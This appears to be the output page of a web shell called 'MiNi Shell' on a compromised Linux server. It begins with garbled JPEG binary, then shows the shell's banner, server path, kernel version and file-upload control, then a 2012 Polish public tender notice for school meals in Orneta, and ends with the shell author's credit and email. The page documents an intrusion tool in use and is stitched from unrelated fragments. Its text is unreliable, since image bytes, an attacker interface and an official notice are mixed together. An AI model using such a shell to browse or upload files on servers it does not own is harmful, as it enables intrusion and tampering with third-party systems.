JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120731/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120731/278182-N-2012.html

<p class="kh_header"><b>Orneta: Świadczenie kompleksowej usługi polegającej na codziennym przygotowaniu, dostawie i wydawaniu gorącego posiłku jednodaniowego dla dzieci i młodzieży uczęszczającej do szkoły podstawowej i gimnazjów w Ornecie oraz szkoły podstawowej w Mingajnach..</b><br>
<b>Numer ogłoszenia: 278182 - 2012; data zamieszczenia: 31.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. 1 Maja 6, 11-130 Orneta, woj. warmińsko-mazurskie, tel. (055) 2421627, faks (055) 2422395.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> nie posiada</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowej usługi polegającej na codziennym przygotowaniu, dostawie i wydawaniu gorącego posiłku jednodaniowego dla dzieci i młodzieży uczęszczającej do szkoły podstawowej i gimnazjów w Ornecie oraz szkoły podstawowej w Mingajnach...</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest świadczenie kompleksowej usługi polegającej na codziennym przygotowaniu, dostawie (transporcie) i wydawaniu gorącego posiłku jednodaniowego w: Szkole Podstawowej nr 4 (SP4) w Ornecie, Szkole Podstawowej (SP) w Mingajnach, Gimnazjum nr 1 i Gimnazjum nr 2 w Ornecie dla dzieci i młodzieży zakwalifikowanej do korzystania z posiłków finansowanych przez Miejsko - Gminny Ośrodek Pomocy Społecznej w Ornecie w ramach ustawy z dnia 12 marca 2004 r. o pomocy społecznej (tekst jednolity: Dz. U. 2009 r. Nr 175 poz. 1362 ze zm. ) oraz ustawy z dnia 29 grudnia 2005 r. o ustanowieniu programu wieloletniego Pomoc państwa w zakresie dożywiania (Dz.U.2005 Nr 267, poz. 2259 ze zm.). 
2) Zakres przedmiotu zamówienia został podzielony na 4 części i obejmuje: 
Część 1. Szkoła Podstawowa Nr 4 w Ornecie 
Planowana dzienna liczba dzieci i młodzieży korzystających z gorących posiłków jednodaniowych - 30 (dzienna liczba posiłków może ulec zmianie w trakcie realizacji przedmiotu zamówienia) 
Posiłek dostarczany będzie do szkoły i wydawany przez Wykonawcę w godzinach od 11:15 do 11:25 (godzina wydawania posiłków może ulec zmianie). 
Szacunkowa ilość gorących posiłków jednodaniowych w okresie realizacji zamówienia - 6 600 szt tj 30 szt (szacunkowa dzienna ilość posiłków) x 22 dni ( średnia liczba dni w miesiącu) x 10 m-cy (liczba miesięcy w okresie realizacji przedmiotu zamówienia )
Część 2. Gimnazjum Nr 1 w Ornecie 
Planowana dzienna liczba dzieci i młodzieży korzystających z gorących posiłków jednodaniowych - 31 (dzienna liczba posiłków może ulec zmianie w trakcie realizacji przedmiotu zamówienia) 
Posiłek dostarczany będzie do szkoły i wydawany przez Wykonawcę w godzinach od 10:30 do 10:40 (godzina wydawania posiłków może ulec zmianie). 
Szacunkowa ilość gorących posiłków jednodaniowych w okresie realizacji zamówienia - 6 820 szt tj 31 szt (szacunkowa dzienna ilość posiłków) x 22 dni (średnia liczba dni w miesiącu) x 10 m-cy (liczba miesięcy w okresie realizacji przedmiotu zamówienia ) 
Część 3. Gimnazjum Nr 2 w Ornecie 
Planowana dzienna liczba dzieci i młodzieży korzystających z gorących posiłków jednodaniowych - 42 (dzienna liczba posiłków może ulec zmianie w trakcie realizacji przedmiotu zamówienia) 
Posiłek dostarczany będzie do szkoły i wydawany przez Wykonawcę w godzinach od 11:30 do 11:40 (godzina wydawania posiłków może ulec zmianie). 
Szacunkowa ilość gorących posiłków jednodaniowych w okresie realizacji zamówienia - 9 240 szt tj 42 szt (szacunkowa dzienna ilość posiłków) x 22 dni ( średnia liczba dni w miesiącu) x 10 m-cy (liczba miesięcy w okresie realizacji przedmiotu zamówienia ) 
Część 4. Szkoła Podstawowa w Mingajnach 
Planowana dzienna liczba dzieci i młodzieży korzystających z gorących posiłków jednodaniowych - 45 (dzienna liczba posiłków może ulec zmianie w trakcie realizacji przedmiotu zamówienia) 
Posiłek dostarczany będzie do szkoły i wydawany przez Wykonawcę w godzinach od 11:00 do 11:10 (godzina wydawania posiłków może ulec zmianie). 
Szacunkowa ilość gorących posiłków jednodaniowych w okresie realizacji zamówienia - 9 900 szt tj 45 szt (szacunkowa dzienna ilość posiłków) x 22 dni ( średnia liczba dni w miesiącu) x 10 m-cy (liczba miesięcy w okresie realizacji przedmiotu zamówienia ) 
3) Zamawiający dopuszcza możliwość składania ofert częściowych 
4) Warunki składania ofert częściowych zostały określone w § 18 Rozdziału I IDW SIWZ 
3. Szczegółowy opis przedmiotu zamówienia, warunki realizacji przedmiotu zamówienia, obowiązki i zobowiązania Wykonawcy zostały przedstawione w Rozdziale III SIWZ Opis przedmiotu zamówienia i w Rozdziale IV SIWZ Projekt umowy...</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt 6 ustawy Pzp. Wielkość zamówienia uzupełniającego do 50 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.50.00.00-5, 55.52.31.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie wykonał lub wykonuje należycie co najmniej 1 usługę żywienia lub dożywiania dla minimum 140 osób dziennie w przypadku składania oferty na wszystkie części w tym dla oferty częściowej:
    - min. 30 osób dziennie dla Części 1 przedmiotu zamówienia i/lub 
    - min. 30 osób dziennie dla Części 2 przedmiotu zamówienia i/lub 
    - min. 40 osób dziennie dla Części 3 przedmiotu zamówienia i/lub 
    - min. 40 osób dziennie dla Części 4 przedmiotu zamówienia, 
która trwała nieprzerwanie przez okres co najmniej 8 miesięcy i wartość brutto wykonanej usługi jest nie mniejsza niż 90 000 zł brutto w przypadku składania oferty na wszystkie części w tym dla oferty częściowej: 
    - nie mniejsza niż 20 000 zł dla Części 1 przedmiotu zamówienia i/lub
    - nie mniejsza niż 20 000 zł dla Części 2 przedmiotu zamówienia i/lub
    - nie mniejsza niż 25 000 zł dla Części 3 przedmiotu zamówienia i/lub
    - nie mniejsza niż 25 000 zł dla Części 4 przedmiotu zamówienia,
Ocena spełnienia warunku nastąpi na podstawie załączonych przez wykonawcę do oferty dokumentów i oświadczeń wymienionych w § 6 ust. 1 pkt 2 IDW tj Wykazu wykonanych usług w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie podaniem ich wartości, przedmiotu , dat wykonania i odbiorców sporządzonego wg Załącznika nr 5 do IDW wraz z dołączeniem dokumentów potwierdzających, że usługa/i te zostały wykonane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie i za spełnienie tego warunku uzna złożenie przez wykonawcę oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy o którym mowa § 6 ust.1 pkt 1 IDW 
Ocena spełnienia warunku nastąpi na podstawie załączonego przez wykonawcę do oferty oświadczenia wymienionego § 6 ust.1 pkt 1 IDW tj Oświadczenia o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo zamówień publicznych sporządzonego wg Załącznika nr 2 do IDW</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)Formularz oferty sporządzony wg Załącznika nr 1 do IDW 
2)Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie wynika bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego ( jeżeli dana sytuacja dotyczy wykonawcy) 
3) Wykaz części zamówienia, której wykonanie Wykonawca zamierza powierzyć podwykonawcom według załącznika nr 6 do IDW 
4)Zastrzeżenie ochrony praw własności intelektualnej i tajemnicy handlowej sporządzone wg załącznika nr 7 do IDW</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ustawy Pzp Zamawiający dopuszcza możliwość dokonania czynności prawnej polegającej na zmianie postanowień zawartej umowy w sprawie zamówienia publicznego w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. 
2. Zamawiający określa następujące warunki, w jakich przewiduje możliwość dokonania zmian zawartej umowy: 
1) konieczność skrócenia terminu umownego zakończenia realizacji przedmiotu zamówienia z uwagi na: 
a)nie przedłużenie okresu trwania programu dożywiania - działającego na podstawie ustawy z dnia 29 grudnia 2005 r. o ustanowieniu programu wieloletniego Pomoc państwa w zakresie dożywiania (Dz.U. Nr 267, poz. 2259 z późn. zm.) Zamawiający będzie uprawniony do odpowiedniego skrócenia okresu realizacji zamówienia bez ponoszenia żadnych konsekwencji i kosztów z tego wynikających. 
b)wystąpienie siły wyższej. Przez siłę wyższa rozumie się zdarzenie lub połączenie zdarzeń obiektywnie niezależnych od stron, które zasadniczo i istotnie utrudniają wykonanie części lub całości zobowiązań wynikających z umowy, których strony nie mogły wcześniej przewidzieć i których nie mogły przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla cywilnoprawnych stosunków zobowiązaniowych. 
2) opóźnienie terminu rozpoczęcia realizacji przedmiotu zamówienia i/lub skrócenia terminu zakończenia realizacji przedmiotu zamówienia o okres nie dłuższy niż 14 dni kalendarzowych od terminu planowanego. Powyższa zmiana nie spowoduje zmiany ceny jednostkowej brutto 1 posiłku jednodaniowego określonej przez Wykonawcę w formularzu ofertowym w całym okresie realizacji przedmiotu umowy., 
3) zmianę ilościowego zakresu rzeczowego przedmiotu zamówienia tj zmniejszenia lub zwiększenia liczby gorących posiłków jednodaniowych Powyższa zmiana nie spowoduje zmiany ceny jednostkowej brutto 1 posiłku jednodaniowego określonej przez Wykonawcę w formularzu ofertowym w całym okresie realizacji przedmiotu umowy., 
4)  zmianę wynagrodzenia Wykonawcy w przypadku:
a) zmiany ilościowego zakresu rzeczowego przedmiotu zamówienia o którym  mowa w ust. 2  pkt  3 
b) zmiany ustawowej stawki podatku VAT
5) zmianę w zatrudnieniu podwykonawców w przypadku, gdy Wykonawca oświadczył, iż wykona umowę osobiście w zakresie zgodnym ze SIWZ oraz zmiany osobowej podwykonawców oraz zakresu podwykonawstwa: 
6) wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy; 
7) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można usunąć w inny sposób, a zmiana będzie umożliwiać usuniecie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony; 
8) Oznaczenie stron umowy, wyłącznie w wyniku dozwolonego w myśl ustawy Prawo zamówień publicznych następstwa prawnego albo zmiany nazwy lub innego oznaczenia strony (firmy) wynikającego z prawa albo dozwolonych prawem czynności powodujących taką zmianę: 
9) Konieczność wprowadzenia zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a są one korzystne dla zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> orneta-umig.bip-um.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Ośrodek Pomocy Społecznej w Ornecie , 11-130 Orneta, ul. 1-go Maja 6 , parter - sekretariat..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.08.2012 godzina 08:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej w Ornecie , 11-130 Orneta, ul. 1-go Maja 6 , parter - sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com